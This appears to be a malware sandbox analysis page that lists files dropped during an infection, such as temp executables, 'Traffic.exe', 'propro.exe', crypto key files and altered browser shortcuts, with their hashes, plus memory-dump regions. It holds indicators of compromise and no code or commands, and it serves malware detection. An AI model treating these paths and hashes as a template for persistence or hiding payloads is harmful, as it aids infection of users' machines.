a93c190fbe492151af41e501480fa32822bb284527a26b51d3e0050c5121df1cf5af1ef47243c0166ce58561673c49c01d16d4ba1642c0eeb56ee7bc0ed4bc52

Download Submit
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

Filesize
3KB

MD5
eead100d89ada14abadbcaf5ea8efe0d

SHA1
c3b3f8a45644c0f7fb3688bc80b200b5da457acd

SHA256
e6b5e7e0ca14ff50a330b7a9221841cd0d0265dd3026fe3787858bf0788c845d

SHA512
979cf4cd7f26e29a1d1550c82763157fcd0be811a403911127fc4063a01fd483e1eb0c168cd324b5a176cc27289430e7fe7030d812bced8c3aabcc3e61371b04

Download Submit
C:\Users\Admin\AppData\Local\Temp\u17s.0.exe

Filesize
321KB

MD5
4783783b35dc6f683945e05c63fd179c

SHA1
241bf77ad2f36b0deb8577315ea74704b39c6178

SHA256
23a4d5066cddcd182fc20851985397ff8aa7543ed8ee14226d483e57ce350b6a

SHA512
338477c418b1f4a16c8093a1b633e77262afad9aa3a4883e8a9c60e8eda94b67e5b094b28341f5c30abcc5204b6538ba0e22ebde80cb683eda1ca4977c375bd4

Download Submit
C:\Users\Admin\AppData\Local\Temp\u17s.1.exe

Filesize
4.6MB

MD5
397926927bca55be4a77839b1c44de6e

SHA1
e10f3434ef3021c399dbba047832f02b3c898dbd

SHA256
4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7

SHA512
cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-983155329-280873152-1838004294-1000\76b53b3ec448f7ccdda2063b15d2bfc3_d1f2fdfb-e063-43be-88aa-b9b0326295b4

Filesize
2KB

MD5
d2487b24eeaeb253571018cec0bd143c

SHA1
9d303881217ff0191b0a721876dd5e55fceb651b

SHA256
8788fb2bb7328292b70e9f91632e4a1765322e0bccad116febfab55c1416987c

SHA512
060ec8d1d7eeafd5116fcf8e12ad688fa2b7e99c1a8545ac0233bf4e53b6e5db10b48bf9524edef8e0fefe3814c65ab24b6028b6f13537c77d365384dcd30af5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-983155329-280873152-1838004294-1000\bb146eadcfacdbe4e4e7d888846ff0e6_d1f2fdfb-e063-43be-88aa-b9b0326295b4

Filesize
2KB

MD5
0158fe9cead91d1b027b795984737614

SHA1
b41a11f909a7bdf1115088790a5680ac4e23031b

SHA256
513257326e783a862909a2a0f0941d6ff899c403e104fbd1dbc10443c41d9f9a

SHA512
c48a55cc7a92cefcefe5fb2382ccd8ef651fc8e0885e88a256cd2f5d83b824b7d910f755180b29eccb54d9361d6af82f9cc741bd7e6752122949b657da973676

Download Submit
C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe

Filesize
541KB

MD5
1fc4b9014855e9238a361046cfbf6d66

SHA1
c17f18c8246026c9979ab595392a14fe65cc5e9f

SHA256
f38c27ecbeed9721f0885d3b2f2f767d60a5d1c0a5c98433357f570987da3e50

SHA512
2af234cac24ec4a508693d9affa7f759d4b29bb3c9ddffd9e6350959fd4da26501553399d2b02a8eeae8dace6bfe9b2ce50462ce3c6547497f5b0ea6ed226b12

Download Submit
C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe

Filesize
304KB

MD5
cc90e3326d7b20a33f8037b9aab238e4

SHA1
236d173a6ac462d85de4e866439634db3b9eeba3

SHA256
bd73ee49a23901f9fb235f8a5b29adc72cc637ad4b62a9760c306900cb1678b7

SHA512
b5d197a05a267bf66509b6d976924cd6f5963532a9f9f22d1763701d4fba3dfa971e0058388249409884bc29216fb33a51846562a5650f81d99ce14554861521

Download Submit
C:\Users\Admin\Desktop\Microsoft Edge.lnk

Filesize
2KB

MD5
6faf2bbaf965e409c71c2488bed04a6f

SHA1
0038c2ec925fdc9d24fbeefb76e2c672bf9f6064

SHA256
ae282fd65c0708d6876a5b1f7db4aec61478c2caa1bdda68d739a154324ba3bd

SHA512
bdea60f6ef356642020fb000a34e672ba1898c5915f0da46515265a5db514257e97887bb3bf3d283ddf5afe9d049547ef03b296e7b4937d04b52acdd14b8bc7b

Download Submit
C:\Users\Public\Desktop\Google Chrome.lnk

Filesize
2KB

MD5
d638556fb7093bd8cfc790de23ec9e9d

SHA1
a1485226539c5d3ef0190b7f60c760744ad13a36

SHA256
7a151ac7c6554c8c5b3804f04edf767250f6c5654239d4f09f4ba2e291c23b6d

SHA512
8f4c9724db4a26bc2083f37c9e104848427c197a1b551d188845d5bbf481bdadde2691675386313aebb877f581a227ace6864850d17c59a096474db8674ce28b

Download Submit
memory/308-497-0x0000000000400000-0x0000000000452000-memory.dmp

Filesize
328KB

Download
memory/460-228-0x0000000000550000-0x000000000059A000-memory.dmp

Filesize
296KB

Download
memory/460-242-0x000000001B060000-0x000000001B070000-memory.dmp

Filesize
64KB

Download
memory/772-36-0x0000000000140000-0x0000000000150000-memory.dmp

Filesize
64KB

Download
memory/772-37-0x0000000073FA0000-0x0000000074750000-memory.dmp

Filesize
7.7MB

Download
memory/772-38-0x0000000004B20000-0x0000000004B30000-memory.dmp

Filesize
64KB

Download
memory/772-40-0x0000000073FA0000-0x0000000074750000-memory.dmp

Filesize
7.7MB

Download
memory/1576-136-0x0000000004970000-0x00000000049DC000-memory.dmp

Filesize
432KB

Download
memory/1576-289-0x0000000000400000-0x0000000002D51000-memory.dmp

Filesize
41.3MB

Download
memory/1576-135-0x0000000002E40000-0x0000000002F40000-memory.dmp

Filesize
1024KB

Download
memory/1576-140-0x0000000000400000-0x0000000002D51000-memory.dmp

Filesize
41.3MB

Download
memory/1980-232-0x00007FF79AE10000-0x00007FF79B064000-memory.dmp

Filesize
2.3MB

Download
memory/3144-59-0x00007FFFEB4B0000-0x00007FFFEBF71000-memory.dmp

Filesize
10.8MB

Download
memory/3144-0-0x00000000005A0000-0x00000000005A8000-memory.dmp

Filesize
32KB

Download
memory/3144-2-0x000000001B210000-0x000000001B220000-memory.dmp

Filesize
64KB

Download
memory/3144-1-0x00007FFFEB4B0000-0x00007FFFEBF71000-memory.dmp

Filesize
10.8MB

Download
memory/3372-247-0x00000000004D0000-0x00000000004E6000-memory.dmp

Filesize
88KB

Download
memory/3572-404-0x0000000000400000-0x0000000000442000-memory.dmp

Filesize
264KB

Download
memory/3596-109-0x0000000005210000-0x0000000005220000-memory.dmp

Filesize
64KB

Download
memory/3596-94-0x0000000006CE0000-0x0000000006D12000-memory.dmp

Filesize
200KB

Download
memory/3596-42-0x0000000074020000-0x00000000747D0000-memory.dmp

Filesize
7.7MB

Download
memory/3596-43-0x0000000005210000-0x0000000005220000-memory.dmp

Filesize
64KB

Download
memory/3596-41-0x00000000050D0000-0x0000000005106000-memory.dmp

Filesize
216KB

Download
memory/3596-46-0x0000000005850000-0x0000000005E78000-memory.dmp

Filesize
6.2MB

Download
memory/3596-57-0x00000000057D0000-0x00000000057F2000-memory.dmp

Filesize
136KB

Download
memory/3596-69-0x0000000005FF0000-0x0000000006056000-memory.dmp

Filesize
408KB

Download
memory/3596-78-0x0000000006110000-0x0000000006464000-memory.dmp

Filesize
3.3MB

Download
memory/3596-80-0x0000000006710000-0x000000000672E000-memory.dmp

Filesize
120KB

Download
memory/3596-81-0x0000000006B00000-0x0000000006B4C000-memory.dmp

Filesize
304KB

Download
memory/3596-106-0x00000000076F0000-0x000000000770E000-memory.dmp

Filesize
120KB

Download
memory/3596-107-0x0000000005210000-0x0000000005220000-memory.dmp

Filesize
64KB

Download
memory/3596-96-0x0000000070220000-0x000000007026C000-memory.dmp

Filesize
304KB

Download
memory/3596-169-0x0000000074020000-0x00000000747D0000-memory.dmp

Filesize
7.7MB

Download
memory/3596-95-0x000000007F360000-0x000000007F370000-memory.dmp

Filesize
64KB

Download
memory/3596-159-0x0000000007D60000-0x0000000007D68000-memory.dmp

Filesize
32KB

Download
memory/3596-158-0x0000000007D80000-0x0000000007D9A000-memory.dmp

Filesize
104KB

Download
memory/3596-110-0x0000000007710000-0x00000000077B3000-memory.dmp

Filesize
652KB

Download
memory/3596-155-0x0000000007C90000-0x0000000007CA4000-memory.dmp

Filesize
80KB

Download
memory/3596-146-0x0000000007C80000-0x0000000007C8E000-memory.dmp

Filesize
56KB

Download
memory/3596-122-0x00000000080E0000-0x000000000875A000-memory.dmp

Filesize
6.5MB

Download
memory/3596-123-0x0000000007A60000-0x0000000007A7A000-memory.dmp

Filesize
104KB

Download
memory/3596-127-0x0000000007AB0000-0x0000000007ABA000-memory.dmp

Filesize
40KB

Download
memory/3596-134-0x0000000007CC0000-0x0000000007D56000-memory.dmp

Filesize
600KB

Download
memory/3596-138-0x0000000007C50000-0x0000000007C61000-memory.dmp

Filesize
68KB

Download
memory/3696-239-0x0000000000A60000-0x0000000000A61000-memory.dmp

Filesize
4KB

Download
memory/3696-330-0x0000000000400000-0x00000000008AD000-memory.dmp

Filesize
4.7MB

Download
memory/4284-185-0x0000000004CC0000-0x0000000004CD0000-memory.dmp

Filesize
64KB

Download
memory/4284-187-0x0000000074020000-0x00000000747D0000-memory.dmp

Filesize
7.7MB

Download
memory/4284-186-0x0000000004CC0000-0x0000000004CD0000-memory.dmp

Filesize
64KB

Download
memory/4492-82-0x0000000005BD0000-0x00000000061E8000-memory.dmp

Filesize
6.1MB

Download
memory/4492-184-0x0000000007010000-0x0000000007060000-memory.dmp

Filesize
320KB

Download
memory/4492-142-0x0000000007BE0000-0x0000000008184000-memory.dmp

Filesize
5.6MB

Download
memory/4492-157-0x0000000006C70000-0x0000000006CE6000-memory.dmp

Filesize
472KB

Download
memory/4492-85-0x0000000005130000-0x0000000005140000-memory.dmp

Filesize
64KB

Download
memory/4492-53-0x0000000000750000-0x0000000000772000-memory.dmp

Filesize
136KB

Download
memory/4492-160-0x0000000006CF0000-0x0000000006D0E000-memory.dmp

Filesize
120KB

Download
memory/4492-58-0x0000000005140000-0x00000000051A6000-memory.dmp

Filesize
408KB

Download
memory/4492-60-0x0000000074020000-0x00000000747D0000-memory.dmp

Filesize
7.7MB

Download
memory/4492-112-0x0000000006680000-0x00000000066BC000-memory.dmp

Filesize
240KB

Download
memory/4492-83-0x0000000005610000-0x0000000005622000-memory.dmp

Filesize
72KB

Download
memory/4492-141-0x0000000006BD0000-0x0000000006C62000-memory.dmp

Filesize
584KB

Download
memory/4492-139-0x0000000007100000-0x000000000762C000-memory.dmp

Filesize
5.2MB

Download
memory/4492-137-0x0000000006A00000-0x0000000006BC2000-memory.dmp

Filesize
1.8MB

Download
memory/4492-84-0x0000000005740000-0x000000000584A000-memory.dmp

Filesize
1.0MB

Download
memory/4696-214-0x00000000030C0000-0x00000000031C0000-memory.dmp

Filesize
1024KB

Download
memory/4696-229-0x0000000000400000-0x0000000002D51000-memory.dmp

Filesize
41.3MB

Download
memory/4760-24-0x0000000003C00000-0x0000000003C04000-memory.dmp

Filesize
16KB

Download
memory/5024-340-0x0000000000400000-0x0000000002D2E000-memory.dmp

Filesize
41.2MB

Download
memory/5024-252-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/5024-183-0x0000000000400000-0x0000000002D2E000-memory.dmp

Filesize
41.2MB

Download
memory/5024-170-0x0000000002F80000-0x0000000003080000-memory.dmp

Filesize
1024KB

Download
memory/5024-171-0x0000000004960000-0x0000000004987000-memory.dmp

Filesize
156KB

Download
memory/5384-632-0x0000000002FE0000-0x0000000002FE1000-memory.dmp

Filesize
4KB

Download
memory/5384-630-0x0000000001510000-0x0000000001511000-memory.dmp

Filesize
4KB

Download
memory/5384-626-0x00000000011F0000-0x00000000011F1000-memory.dmp

Filesize
4KB

Download
memory/5384-624-0x00000000011E0000-0x00000000011E1000-memory.dmp

Filesize
4KB

Download
memory/5676-594-0x000000001B050000-0x000000001B160000-memory.dmp

Filesize
1.1MB

Download
memory/5676-574-0x000000001B050000-0x000000001B160000-memory.dmp

Filesize
1.1MB

Download
memory/5676-633-0x000000001B050000-0x000000001B160000-memory.dmp

Filesize
1.1MB

Download
memory/5676-602-0x000000001B050000-0x000000001B160000-memory.dmp

Filesize
1.1MB

Download
memory/5676-596-0x000000001B050000-0x000000001B160000-memory.dmp

Filesize
1.1MB

Download
memory/5676-571-0x000000001B050000-0x000000001B160000-memory.dmp

Filesize
1.1MB

Download
memory/5676-629-0x000000001B050000-0x000000001B160000-memory.dmp

Filesize
1.1MB

Download
memory/5676-580-0x000000001B050000-0x000000001B160000-memory.dmp

Filesize
1.1MB

Download
memory/5676-572-0x000000001B050000-0x000000001B160000-memory.dmp

Filesize
1.1MB

Download
memory/5676-623-0x000000001B050000-0x000000001B160000-memory.dmp

Filesize
1.1MB

Download
memory/5676-592-0x000000001B050000-0x000000001B160000-memory.dmp

Filesize
1.1MB

Download
memory/5676-620-0x000000001B050000-0x000000001B160000-memory.dmp

Filesize
1.1MB

Download
memory/5676-577-0x000000001B050000-0x000000001B160000-memory.dmp

Filesize
1.1MB

Download
memory/5676-583-0x000000001B050000-0x000000001B160000-memory.dmp

Filesize
1.1MB

Download
memory/5676-614-0x000000001B050000-0x000000001B160000-memory.dmp

Filesize
1.1MB

Download